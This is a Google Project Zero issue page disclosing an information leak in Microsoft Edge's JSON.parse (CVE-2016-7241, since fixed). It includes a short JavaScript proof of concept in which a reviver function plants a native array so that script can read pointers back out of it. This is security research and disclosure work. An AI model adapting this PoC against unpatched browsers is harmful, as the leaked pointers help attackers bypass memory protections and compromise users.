Monorail Project: project-zero Issues People Development process History Sign in
New issue
Advanced search Search tips
Issue 952 Microsoft Edge: Info Leak in JSON.parse
Starred by 1 user Project Member Reported by natashenka@google.com, Sep 22 2016 Back to list
Status: Fixed
Owner:
Closed: Nov 2016
Cc:



Sign in to add a comment
There is an info leak in JSON.parse. If this function is called with a reviver, and the reviver modifies the output object to contain a native array, the Walk function assumes that this array is a Var array, and writes pointers to it. These pointers can then be read out of the array by script.

A minimal PoC is as follows:

var once = false;
var a = 1;

function f(){
        if(!once){
		a = new Array(1, 2, 3);
		this[2] = a;
	}
        once = true;
	return {};

}


JSON.parse("[1, 2, [4, 5]]", f);

A full PoC is attached. When loaded in a browser, this PoC will delay pointers in an alert dialog.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

 
j.html
558 bytes View Download
Project Member Comment 1 by natashenka@google.com, Nov 10 2016
Labels: CVE-2016-7241
Status: Fixed
Project Member Comment 2 by natashenka@google.com, Dec 1
Labels: -Restrict-View-Commit
Comment 3 Deleted
Sign in to add a comment